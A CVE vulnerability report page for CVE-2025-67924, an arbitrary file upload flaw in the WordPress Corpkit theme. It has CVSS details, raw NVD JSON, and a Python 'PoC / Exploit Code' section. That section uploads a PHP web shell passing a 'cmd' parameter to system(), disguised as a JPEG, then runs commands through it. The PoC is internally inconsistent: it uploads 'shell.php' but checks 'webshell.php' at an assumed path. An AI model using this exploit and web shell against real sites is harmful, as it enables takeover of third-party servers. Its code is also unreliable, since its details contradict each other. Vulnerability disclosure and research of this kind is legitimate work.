Security Vulnerability Report
中文
CVE-2025-67924 CVSS 9.9 CRITICAL

CVE-2025-67924

Published: 2026-01-08 10:15:51
Last Modified: 2026-04-27 18:16:49

Description

Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Corpkit corpkit allows Upload a Web Shell to a Web Server.This issue affects Corpkit: from n/a through <= 2.0.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Corpkit主题 <= 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import os # CVE-2025-67924 PoC - WordPress Corpkit Theme Arbitrary File Upload # Target: WordPress site with Corpkit theme <= 2.0 target_url = "http://target-wordpress-site.com" upload_endpoint = f"{target_url}/wp-content/themes/corpkit/includes/upload-handler.php" # WebShell content - simple PHP backdoor webshell = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; } ?>" # Prepare the malicious file files = { 'file': ('shell.php', webshell, 'image/jpeg') } # Send the upload request try: response = requests.post(upload_endpoint, files=files, timeout=10) if response.status_code == 200: print("[+] File uploaded successfully!") # Extract the uploaded file path from response uploaded_path = f"{target_url}/wp-content/uploads/webshell.php" print(f"[+] WebShell location: {uploaded_path}") # Test command execution test_cmd = "whoami" test_url = f"{uploaded_path}?cmd={test_cmd}" test_response = requests.get(test_url) if test_response.status_code == 200: print(f"[+] Command execution confirmed: {test_response.text.strip()}") print("[!] Vulnerability confirmed - WebShell uploaded successfully") else: print("[-] WebShell may not be at expected location") else: print(f"[-] Upload failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67924", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:51.347", "lastModified": "2026-04-27T18:16:49.467", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Corpkit corpkit allows Upload a Web Shell to a Web Server.This issue affects Corpkit: from n/a through <= 2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/corpkit/vulnerability/wordpress-corpkit-theme-2-0-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}